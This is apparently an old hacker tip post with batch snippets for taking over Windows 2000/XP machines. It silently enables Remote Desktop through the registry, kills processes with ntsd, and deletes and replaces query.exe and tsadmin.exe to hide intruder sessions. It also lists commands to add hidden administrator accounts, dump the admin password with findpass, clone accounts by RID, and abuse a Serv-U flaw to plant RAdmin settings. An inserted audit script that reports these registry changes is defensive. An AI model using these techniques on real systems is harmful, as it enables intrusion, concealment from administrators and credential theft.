Enabling 3389 on 2000/XP


rem Build a .reg file that enables Terminal Services (TermDD/TermService set to
rem auto-start, TSEnabled=1) with the RDP listener on port 3389 (0xD3D), then
rem import it silently. The first echo uses ">" so a stale 3389.reg is overwritten.
echo Windows Registry Editor Version 5.00 >3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo "Enabled"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.reg
echo "ShutdownWithoutLogon"="0" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.reg
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "TSEnabled"=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.reg
echo "Start"=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo "Hotkey"="1" >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>3389.reg
echo "PortNumber"=dword:00000D3D >>3389.reg
regedit /s 3389.reg

A script to list processes.

rem Generate ps.vbs, which uses WMI to print the handle (PID), name and path of every process
@echo for each ps in getobject _ >ps.vbs
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs
@echo wscript.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs
cscript ps.vbs

ntsd -c q -p 200 ( attach ntsd to process 200 and quit, which terminates that process )


rem On XP, Remote Desktop is governed by fDenyTSConnections; 0 allows connections
echo Windows Registry Editor Version 5.00 >3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg
echo "fDenyTSConnections"=dword:00000000 >>3389.reg
regedit /s 3389.reg

Query the terminal services port: reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
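As an added example (not part of the original post), the following batch script reads back the same registry values the .reg snippets above change and reports them from an administrator's point of view: whether Terminal Services connections are allowed, how TermService starts, which port RDP-Tcp listens on, and whether query.exe and tsadmin.exe are still present in system32 and dllcache. It assumes the XP-style reg.exe ("reg query <key> /v <value>", printing "<name>  REG_DWORD  0x..."); the report file name and the :getval / :checkfile helper labels are this example's own choices.

```batch
@echo off
rem Added example, not from the original post: audit the Terminal Services
rem settings touched by the 3389.reg snippets, so an administrator can see
rem whether Remote Desktop was enabled, on which port, and whether the
rem session tools the post removes (query.exe, tsadmin.exe) are still in place.
rem Assumes XP-style reg.exe output; the report path is an arbitrary choice.
setlocal enabledelayedexpansion

set "TS=HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
set "REPORT=%TEMP%\ts_audit.txt"
echo Terminal Services audit on %COMPUTERNAME% > "%REPORT%"

rem Read the values the post changes into variables (see :getval below).
call :getval "%TS%" fDenyTSConnections DENY
call :getval "%TS%" TSEnabled TSENABLED
call :getval "HKLM\SYSTEM\CurrentControlSet\Services\TermService" Start TERMSTART
call :getval "%TS%\WinStations\RDP-Tcp" PortNumber PORT

echo fDenyTSConnections = !DENY! >> "%REPORT%"
echo TSEnabled          = !TSENABLED! >> "%REPORT%"
echo TermService Start  = !TERMSTART! >> "%REPORT%"
echo RDP-Tcp PortNumber = !PORT! >> "%REPORT%"

rem Interpret the raw values. Start=0x2 means the service starts automatically,
rem 0x4 means disabled. PortNumber 0xd3d is decimal 3389, the default.
if /i "!DENY!"=="0x0" echo FINDING: fDenyTSConnections is 0, Remote Desktop connections are allowed >> "%REPORT%"
if /i "!TERMSTART!"=="0x2" echo FINDING: TermService is set to start automatically >> "%REPORT%"
if /i "!PORT!"=="0xd3d" echo INFO: RDP listens on the default port 3389 >> "%REPORT%"
if /i not "!PORT!"=="0xd3d" echo FINDING: RDP PortNumber is !PORT!, not the default, check who changed it >> "%REPORT%"

rem The post deletes these tools from system32 and dllcache so that sessions
rem can no longer be listed or managed. tsadmin.exe ships only with server
rem editions, so its absence is a finding only where it was originally installed.
for %%f in (query.exe tsadmin.exe) do call :checkfile %%f

echo Report written to %REPORT%
type "%REPORT%"
endlocal
goto :eof

rem :getval <key> <valuename> <outvar>  reads one registry value, "not-set" if absent
:getval
set "%~3=not-set"
for /f "tokens=3" %%v in ('reg query "%~1" /v "%~2" 2^>nul ^| find /i "%~2"') do set "%~3=%%v"
goto :eof

rem :checkfile <name>  reports whether a file is present in system32 and dllcache
:checkfile
if exist "%SystemRoot%\system32\%~1" (echo INFO: %~1 present in system32 >> "%REPORT%") else (echo FINDING: %~1 missing from system32 >> "%REPORT%")
if exist "%SystemRoot%\system32\dllcache\%~1" (echo INFO: %~1 present in dllcache >> "%REPORT%") else (echo FINDING: %~1 missing from dllcache >> "%REPORT%")
goto :eof
```

Run it from an administrative command prompt; a file missing from both system32 and dllcache is notable because Windows File Protection would normally restore a deleted system32 copy from dllcache.
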

After logging into the terminal, two things are very dangerous: query.exe and tsadmin.exe need to be killed.
You can write two bat files:
@echo off
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
rem copy in a fake one
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe

@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.exe

Some useful old knowledge
type c:\boot.ini ( view the system version )
net start ( list the services already started )
query user ( view current terminal connections )
net user ( list current users )
net user <user> <password> /add ( create an account )
net localgroup administrators <user> /add ( promote a user to administrator )
ipconfig -all ( view IP configuration and the like )
netstat -an ( view the current network state )
findpass <computer name> <administrator name> <winlogon PID> ( get the administrator password )
When cloning, Administrator corresponds to 1F4,
guest to 1F5,
tsinternetuser to 3E8


If the other side does not have 3389 open but has Remote Administrator Service installed,
connect with this command: F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg"
Explanation: use the serv-u vulnerability to import your own pre-configured radmin registry entries.
First back up the other side's: F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"